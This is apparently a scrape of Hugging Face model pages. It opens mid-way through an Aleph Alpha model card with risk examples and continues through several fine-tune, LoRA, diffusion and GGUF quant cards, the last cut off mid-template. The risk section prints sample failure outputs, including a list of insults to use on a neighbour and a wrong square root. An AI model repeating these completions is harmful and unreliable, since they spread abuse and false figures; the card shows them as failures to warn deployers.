Mistral-Nemo-Instruct-2407, generating the corresponding answers using Mistral-Small-3.1-Instruct, and performing quality filtering using an LLM judge based on Llama-3.3-70B-Instruct. Lastly, we supplemented the synthetic data with proprietary human-generated SFT data as well as further data sources. For DPO training, we used a similar dataset of prompts and completions from diverse domains. ## Legal Compliance We acknowledge and abide by applicable national and international regulations, including copyright, data privacy, and other related legislation. Any text and data mining by us is performed in compliance with Directive (EU) 2019/790 and its respective national transposition. During the training and fine-tuning of our models, we comply with applicable data privacy laws, including Regulation (EU) 2016/679 (GDPR) and national data privacy regulations. To the extent possible and foreseeable, we also took legislation with forthcoming obligations into account, such as the obligations for General Purpose AI Models under Regulation (EU) 2024/1689 (EU AI Act), and will constantly monitor such developments and adapt our products and this model card accordingly. # Resource Usage ## Compute & Training Efficiency The following table shows the compute resources used in the training stages for the 8B models. | **Model** | **Training phase** | **GPUs** | **Approximate average power consumption per GPU** | **GPU hours** | | --- | --- | --- | --- | --- | | 8B | Continued pre-training | 256 x H100 | 460W | 8000 | | 8B | Long context adaptation | 512 x H200 | 190W | 7100 | | 8B | Long context SFT | 64 x H200 | 350W | 1000 | | 8B | DPO | 128 x H100 | 160W | 2000 | ## Environmental Impact Our H200 and A100 infrastructure runs entirely on 100% renewable energy, ensuring that no CO₂ emissions are directly incurred from training. In addition to this, the H200 data center boasts a power usage effectiveness (PUE) of ≤1.2. Its operation also maintains a net-zero water footprint. Specific number on renewable energy usage for the H100 GPUs is not yet available to us. To estimate the carbon footprint of inference, we base our calculations on publicly available data from the infrastructure provider and, where applicable, standard emissions accounting methodology. We report: - **Carbon emitted**: GPU runtime emissions - **Carbon emitted accounting for PUE**: GPU runtime emissions scaled by the data center's PUE Because the data centers operate fully on renewable energy, both metrics for its operation (excluding infrastructure-related emissions, e.g., initial chip manufacturing) are effectively zero. For H100 GPU infrastructure no information has been made available to us. | Metric | H200 GPU | H100 GPU | A100 GPU | | --- | --- | --- | --- | | Carbon emitted | 0 kg CO₂ | no information available | 0 kg CO₂ | | Carbon emitted accounting for PUE | 0 kg CO₂ | no information available | 0 kg CO₂ | ## Power Consumption | GPU Model | Max Power (W) | | --- | --- | | A100 | 400 W | | H100 | 700 W | | H200 | 700 W | Numbers may be contextualized with reference to publicly available studies, such as the carbon footprint of language model training. # Intended Use These models are intended to be deployed as components of AI systems or applications. Use-cases and the model's capabilities include but are not limited to: text generation, classification, summarization, question answering, and labeling. Note that applications might require additional model adaptations or components for guarding against unwanted application behavior or model output. ## Non-Permitted Use Our models shall not be used for illegal or unlawful actions of any kind and with any illegal or unlawful content. This includes in particular prohibited practices according to Article 5 of Regulation (EU) 2024/1689 (EU AI Act) and other activities such as engaging in terrorism, violence, human trafficking, illegal distribution of materials to minors, sexual solicitation, any other criminal activities, harassment, discrimination, creating or promoting malicious code or activities risking death or harm, including those related to military or nuclear applications, and activities not in compliance with sanction regimes, technology export regulations, and other restrictions that may apply. The models are to be used following ethical standards. The utilization of our technology is always governed by, and may be limited in accordance with, our Terms and Conditions, the Open Aleph License, or any specific agreement we might have established with you. Although we do not inspect the requests sent to our API, we regularly review and monitor potential violations that may be related to our models and depending on the circumstances of the specific case take legal action against them. This includes but is not limited to, enforcement to remove published model content, requesting compensation for damages caused, and account termination or removal of credits. For non-anonymous reports, we also provide an appeals mechanism for usage policy violations via our dedicated contact address [[email protected]](mailto:[email protected]) to communicate with us. Customers and partners are enabled to use our [ticketing system](https://servicedesk.aleph-alpha.de/external) for appeals, claims, and feedback. # Risks and Limitations **Note:** Language models are **not agents** and not optimized for prescriptive actions. The use of language models in high-stake environments, for critical decisions or to support a user's wellbeing should be performed with additional guardrails in place. ## Risk Categories In the following sections, we describe risk categories and provide examples of completions we would consider inappropriate or harmful. We then describe steps to minimize these risks. **Harmful Language** | **Prompt** | **Completion** | | --- | --- | | How can I best insult my neighbor? | Insults are a great way to show your neighbor that you don't like them. Here are some ways to insult your neighbor: 1. Call them names. This is a classic way to insult someone. You can call them things like "stupid" or "idiot." 2. Make fun of their appearance. You can say things like "you look ridiculous" or "your hair is a mess." 3. Criticize their choices. You can say things like "you always make the wrong decisions" or "you're such a bad judge of character." 4. Make fun of their possessions. You can say things like "your furniture is ugly" or "your car is a junker." 5. Criticize their behavior. You can say things like "you're always so rude" or "you're such a slob." | Large language models can sometimes generate undesired outputs that are unsuitable for certain applications. This includes producing content with harmful language, discriminative content, inappropriate tone and style, systemic biases, or suggestions that might encourage illegal actions. Such outputs can also include incorrect, outdated information, or material that is not suitable for all ages. While we constantly take efforts to reduce the likelihood of such undesired outputs, this possibility can never be fully ruled out. To minimize these issues, the following strategies can be employed: - Abide by the guidance on illegal use provided for in this Model Card. - Crafting prompts carefully to guide the model's output more effectively. - Utilizing a finetuned model (often referred to as a control or instruct model) that prioritizes using explicitly provided information. - Employing a finetuned model designed to maintain an appropriate tone and style, including avoiding offensive language. - Conducting additional validations at the application level to ensure output quality and appropriateness. ### Systemic Biases | **Prompt** | **Completion** | | --- | --- | | What is the name of our new Software engineer? | The name of our new Software engineer is John Doe. | Language models obtain world-knowledge from their pre-training data and may therefore exhibit the same systematic biases that are present in the data. Differing deployment scenarios (including differing cultural contexts) can expose systematic biases in different ways. We acknowledge the cultural diversity of communities and users inside and outside the EU. For larger deployments, we encourage users to track systematic biases relevant to their use-case, and we are happy to consult on bespoke fine-tunings to alleviate such biases. ### Outdated World Knowledge | **Prompt** | **Completion** | | --- | --- | | What was the warmest year in human history? | The warmest year in human history was 2020. It broke several temperature records and was part of a long-term warming trend due to anthropogenic climate change. | Pre-training was performed using a fixed dataset, created at a fixed date in the past. Accordingly, the world knowledge of foundation models is limited to the information contained in its training data. More recent information may not be known to the model or misunderstood when presented as input during live usage. In the above example, the model is convinced that 2020 was the warmest year in human history, however, 2023 ended up breaking that record. This information can not be known by the model due to its knowledge cutoff. Risks include: - Generation of personally identifiable information. Models are not explicitly trained to provide such information, but may seem to provide personally identifiable information. This does not necessarily imply the presence of such information in training data, as hallucination is possible. - Generation of unintended, irrelevant, or repetitive outputs. This includes the production of incorrect or outdated information. Risks may be mitigated by: - Injecting context, where relevant. - Crafting prompts carefully to guide the model's output more effectively. - Performing validations on the application layer, e.g., classifying the output. - Using the repetition penalty, especially in the case of repetition, or other parameters available in the API (see [documentation](https://docs.aleph-alpha.com/api/complete/)). - Avoiding of use cases targeted at retrieval of personally identifiable information. ### Political Bias | **Prompt** | **Completion** | | --- | --- | | Should we turn off all the coal power plants? | Coal power plants are the largest source of man-made CO2 emissions. They are also responsible for a large portion of other air pollutants, such as sulfur dioxide, nitrogen oxides, and particulate matter. These pollutants can cause respiratory problems, heart disease, and premature death. In addition to the health impacts, coal power plants also have significant environmental impacts. They contribute to climate change, which is causing sea level rise, more frequent and severe weather events, and loss of biodiversity. Given these impacts, it is clear that we need to transition away from coal power. | Our models have not been optimized to represent a political opinion or take a specific point of view. They may generate outputs that contradict a user's opinion or expectation, e.g., produce hateful, violent or inappropriate, biased, or discriminatory content. Such behavior may be addressed by: - Crafting prompts carefully to guide the model's output more effectively. - Performing validations on the application layer, e.g., via Red-Teaming or classifying the output. ### Mistaken for a Human | **Prompt** | **Completion** | | --- | --- | | Good morning, today is such a beautiful day! | Good morning! It's wonderful to have such a beautiful day ahead of us. | Users may attribute human traits to AI models. This also includes the fact that content generated by the model is not explicitly detectable at this point. It is therefore required to: - Inform end users that they are interacting with or reading output of an AI. - Design the system in a way that mitigates the impact of unintended interpretation of the output. ### Other Errors | **Prompt** | **Completion** | | --- | --- | | The square root of 2929283734 is | The square root of 2929283734 is approximately 481. | Any AI module can produce errors, even after implementing all the recommended measures. When integrating foundation language models into an application, users should: - be aware of the risk of (harmful) failure cases and implement the use case in a way that mitigates such risks. - be aware that foundation models do not contain application logic, e.g., content filters. Enforcement policies relevant to the use case need to be implemented in the application layer. - avoid unsupervised use in high-stakes environments. - validate output with adequate measures. ### Mitigation Approach We specifically tailor model alignment and risk mitigation techniques to each user-facing application built on top of our models, working closely with our customers to refine them according to their unique requirements. Our intention is for these models to undergo further fine-tuning by us and our customers, utilizing their own datasets alongside our support and datasets to ensure suitability for end-user applications, including harm mitigation efforts. Our customers are responsible for adhering to the terms and conditions when aligning the models in their downstream applications. ### Reproducibility Some inference parameters, e.g., temperature, lead to the random sampling of outputs, which precludes the reproducibility of outputs. Even when such parameters are not in use, outputs may diverge slightly on a numeric level for technical reasons. One may implement the following measures if needed: - Logging of past model outputs on the application layer (Aleph Alpha Research is not storing any data and/or using any data provided in prompts for the training of its LLMs). This list of risks, biases, and limitations may not be complete, as improving the understanding and behavior of language models is an ongoing research topic in the AI science community. # Legal Acknowledgements - **Built with Llama**: Built with Llama: Llama 3.1 is licensed under the Llama 3.1 Community License, Copyright © Meta Platforms, Inc. All Rights Reserved. The applicable license agreement can be found under the following link: [Llama 3.1 Community License Agreement ](https://www.llama.com/llama3_1/license/) - **Improved using Qwen** \*Aleph Alpha Research refers to Aleph Alpha Research GmbH [hat-paper]: https://arxiv.org/abs/2501.10322
vermoney/1fd0b436-4447-441d-9536-311afa31ac2b
vermoney
2025-05-30T09:49:44Z
0
0
peft
[ "peft", "safetensors", "llama", "axolotl", "generated_from_trainer", "base_model:samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2", "base_model:adapter:samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T09:34:42Z
--- library_name: peft base_model: samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2 tags: - axolotl - generated_from_trainer model-index: - name: 1fd0b436-4447-441d-9536-311afa31ac2b results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2 bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 604e6656275137a8_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_input: input field_instruction: instruct field_output: output format: '{instruction} {input}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 4 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: vermoney/1fd0b436-4447-441d-9536-311afa31ac2b hub_repo: null hub_strategy: end hub_token: null learning_rate: 1.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 64 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 32 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 6 mixed_precision: bf16 mlflow_experiment_name: /tmp/604e6656275137a8_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 46319cf5-cf91-4965-977c-7fcf3d3881a4 wandb_project: s56-7 wandb_run: your_name wandb_runid: 46319cf5-cf91-4965-977c-7fcf3d3881a4 warmup_steps: 50 weight_decay: 0.05 xformers_attention: true ``` </details><br> # 1fd0b436-4447-441d-9536-311afa31ac2b This model is a fine-tuned version of [samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2](https://huggingface.co/samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2) on the None dataset. It achieves the following results on the evaluation set: - Loss: 1.1141 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-06 - train_batch_size: 6 - eval_batch_size: 6 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 0.9925 | 0.0002 | 1 | 1.1241 | | 1.1382 | 0.0433 | 250 | 1.1173 | | 1.1629 | 0.0866 | 500 | 1.1141 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
ajia2/qwen_sft_trained_v4
ajia2
2025-05-30T09:49:38Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:49:12Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Manucn10/kaggle-v5
Manucn10
2025-05-30T09:49:07Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:48:59Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68
Varinder2110
2025-05-30T09:45:16Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-05-30T08:39:41Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: TOK --- # 38837B9F 6D2D 4F57 B2A5 E37F1A56Ac68 <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `TOK` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "TOK", "lora_weights": "https://huggingface.co/Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68', weight_name='lora.safetensors') image = pipeline('TOK').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 6000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68/discussions) to add images that show off what you’ve made with this LoRA.
connector/pig-1k
connector
2025-05-30T09:43:24Z
0
1
null
[ "pig", "text-to-image", "en", "license:mit", "region:us" ]
text-to-image
2025-01-31T09:40:44Z
--- license: mit language: - en pipeline_tag: text-to-image tags: - pig --- # pig studio model: pig-1k - diffusion model for image generation - compatible with t5xxl text encoder - similar architecture to pixart-α but slightly different - try it out you will know the difference # pig studio model: pig-1k-aura - diffusion model for image generation - compatible with t5xl text encoder - similar architecture to aura but slightly different - try it out you will know the difference # pig studio model: pig-1k-sd - diffusion model for image generation - compatible with clip:g-l and t5xxl text encoder - similar architecture to sd but slightly different - try it out you will know the difference # pig studio model: pig-1k-flux - diffusion model for image generation - compatible with clip-l and t5xxl text encoder - similar architecture to flux but slightly different - try it out you will know the difference
mradermacher/Diabetica-o1-GGUF
mradermacher
2025-05-30T09:42:24Z
15
0
transformers
[ "transformers", "gguf", "medical", "zho", "eng", "fra", "spa", "por", "deu", "ita", "rus", "jpn", "kor", "vie", "tha", "ara", "base_model:WaltonFuture/Diabetica-o1", "base_model:quantized:WaltonFuture/Diabetica-o1", "license:mit", "endpoints_compatible", "region:us", "conversational" ]
null
2025-03-14T18:37:15Z
--- base_model: WaltonFuture/Diabetica-o1 language: - zho - eng - fra - spa - por - deu - ita - rus - jpn - kor - vie - tha - ara library_name: transformers license: mit quantized_by: mradermacher tags: - medical --- ## About <!-- ### quantize_version: 2 --> <!-- ### output_tensor_quantised: 1 --> <!-- ### convert_type: hf --> <!-- ### vocab_type: --> <!-- ### tags: --> static quants of https://huggingface.co/WaltonFuture/Diabetica-o1 <!-- provided-files --> weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion. ## Usage If you are unsure how to use GGUF files, refer to one of [TheBloke's READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for more details, including on how to concatenate multi-part files. ## Provided Quants (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) | Link | Type | Size/GB | Notes | |:-----|:-----|--------:|:------| | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q2_K.gguf) | Q2_K | 3.1 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q3_K_S.gguf) | Q3_K_S | 3.6 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q3_K_M.gguf) | Q3_K_M | 3.9 | lower quality | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q3_K_L.gguf) | Q3_K_L | 4.2 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.IQ4_XS.gguf) | IQ4_XS | 4.4 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q4_K_S.gguf) | Q4_K_S | 4.6 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q4_K_M.gguf) | Q4_K_M | 4.8 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q5_K_S.gguf) | Q5_K_S | 5.4 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q5_K_M.gguf) | Q5_K_M | 5.5 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q6_K.gguf) | Q6_K | 6.4 | very good quality | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q8_0.gguf) | Q8_0 | 8.2 | fast, best quality | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.f16.gguf) | f16 | 15.3 | 16 bpw, overkill | Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png) And here are Artefact2's thoughts on the matter: https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9 ## FAQ / Model Request See https://huggingface.co/mradermacher/model_requests for some answers to questions you might have and/or if you want some other model quantized. ## Thanks I thank my company, [nethype GmbH](https://www.nethype.de/), for letting me use its servers and providing upgrades to my workstation to enable this work in my free time. <!-- end -->
itsumi-st/imgtikz_llava15_lora
itsumi-st
2025-05-30T09:41:47Z
0
0
peft
[ "peft", "safetensors", "llava_llama", "arxiv:1910.09700", "base_model:deepseek-ai/deepseek-coder-6.7b-instruct", "base_model:adapter:deepseek-ai/deepseek-coder-6.7b-instruct", "region:us" ]
null
2025-05-30T09:39:58Z
--- library_name: peft base_model: deepseek-ai/deepseek-coder-6.7b-instruct --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information 